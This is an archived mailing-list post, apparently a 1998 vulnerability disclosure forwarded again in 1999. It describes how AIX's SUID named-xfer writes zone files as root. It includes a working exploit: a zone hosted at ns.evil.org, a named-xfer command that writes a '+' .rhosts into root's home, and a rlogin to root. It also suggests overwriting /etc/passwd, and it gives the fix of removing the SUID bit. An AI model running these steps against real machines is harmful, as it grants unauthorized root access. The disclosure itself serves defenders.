Aleph, I thought I posted this to the list almost two years ago, but I never saw it show up and it hasn't turned up in any of the usual archives of such things. I didn't bother to save a copy so I just figured, oh well. It turns out a friend that I sent it to saved a copy, so here it is again (below) for the sake of posterity. - Kyle Kyle Amon email: amonkat_private url: http://www.gnutec.com/~amonk KeyID 1024/26DD13D9 Fingerprint = 7D 86 D1 AE 4B E9 91 6A 4B BC B5 B4 12 F0 D3 1A ________ _______ ________ ________ __ __ / ______/ / ____ \ / ______/ / ______/ / \ / / / /_____ / /____/ / / /_____ / /_____ / /\ \/ / / ______/ / __ ___/ / ______/ / ______/ /_/ \__/ / / / / \ \ / /_____ / /_____ ________ /_/ /_/ \_\ /_______/ /_______/ / ____ / __ __ _______ __ __ ______ __ / /___/ / __ / / _/_/ / _____/ / / / / /_ __/ /\ / / /_______/ / \ / /_/_/ / /____ / / / / / / / \ / / __ __ | | / _ / / _____/ / / _/_/ / / / /\ \/ / / /_ / / \/ / / \ \ / /____ \ \_/_/ __/ /_ / / \ / ( (/_\/ / /_/ \_\ /______/ \__/ /_____/ /_/ \/ \_/ \_/ () A man denied legal counsel, held without bail or trial, is a political prisoner in any country, especially the United States of America! http://www.kevinmitnick.com http://www.2600.com/kevin Petition to Microsoft Corporation for Open Source Consumer Windows! http://www.linuxresources.com/linuxreview/petition.html ---------- Forwarded message ---------- Date: Thu, 18 Feb 1999 22:08:12 -0500 (EST) From: Cherie Earnest <cherieat_private> To: Kyle Amon <amonkat_private> Subject: named-xfer hole on AIX (fwd) ---------- Forwarded message ---------- Date: Thu, 8 Jan 1998 07:58:48 -0500 (EST) From: amonkat_private To: cherieat_private Subject: named-xfer hole on AIX (fwd) Friends, Romans, Geeks, I don't know if anyone's noticed this before, but if so I ain't heard about it so here goes nuthin... :-) On AIX, named-xfer has the following permissions... -r-sr-xr-- 1 root system 32578 Feb 18 1997 /usr/sbin/named-xfer which of course means that only root and members of the system group have execute permission but that (since the SUID bit is set) it executes as root even when run by non-root members of the system group. So, although one would have to already be a member of the system group (or manage to obtain such status) in order to exploit the problem described here, it's still a rather significant problem. And its much worse than the old sendmail -C problem which was still exploitable in AIX up until very recently when one was a member of the system group. The big difference here being that sendmail -C only let one read files they shouldn't have been able to read whereas this problem lets one write them :-). The problem is that named-xfer writes it's resulting zone file (when using the -f option) without (or at least before) relinquishing it's root privilege (and I doubt it ever relinquishes it since it doesn't really need it in the first place). So, for example, if one were to set up a zone at ns.evil.org in the following manner... putting this in the named.boot file... primary + db.hack and giving db.hack contents as follows... @ IN SOA evil.org. nsa.evil.org. ( 666 ; Serial 10800 ; Refresh 3600 ; Retry 3600000 ; Expire 86400 ) ; Minimum TTL then run a command like this on some victim AIX machine... named-xfer -z + -f /.rhosts ns.evil.org they will put this file in root's home directory... :-) -rw-r--r-- 1 root system 155 Jan 8 03:52 .rhosts with contents of this... :-) ; zone '+' last serial 0 ; from 10.10.10.10 at Thu Jan 8 03:52:19 1998 $ORIGIN . + IN SOA evil.org. nsa.evil.org. ( 666 10800 3600 3600000 86400 ) All they need do then is create a user like this (anywhere)... IN:!:666:1::/home/IN:/bin/ksh and login or su to it then rlogin to victim AIX machine as root! :-) Isn't that special? So now we have reason number 9999 not to run the BSD "r" commands on our machines. And as I'm sure you all know, this is but one semi-creative use for this. I'm sure the gentle reader will be able to come up with a handfull of others... and the not so gentle reader will immediately see possibilities for overwriting the /etc/passwd file or the kernel. :-( Now, lest you think me a true cad, the simple fix is that the damn thing doesn't need it's SUID bit set in order to work (why it comes with it on, I couldn't imagine). So, check yer boxes boys n girls and dump this here bit from this here program. :-) Best Regards, Kyle P.S. I only verified this on AIX 4.1.5 and 4.2.1 but it is likely a pervasive problem. Kyle Amon email: amonkat_private Unix Systems Administrator phone: (203) 486-3290 Security Specialist pager: 1-800-759-8888 PIN 1616512 IBM Global Services or 1616512at_private email: amonkat_private url: http://www.gnutec.com/kyle KeyID 1024/173D96C9 Fingerprint = 90 4F 0B D4 2D 37 E7 61 1A 31 7B F2 72 04 66 1A Windows 95: A 32-bit patch for a 16-bit GUI shell running on top of an 8-bit operating system written for a 4-bit processor by a 2-bit company who cannot stand 1 bit of competition.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:05:15 PDT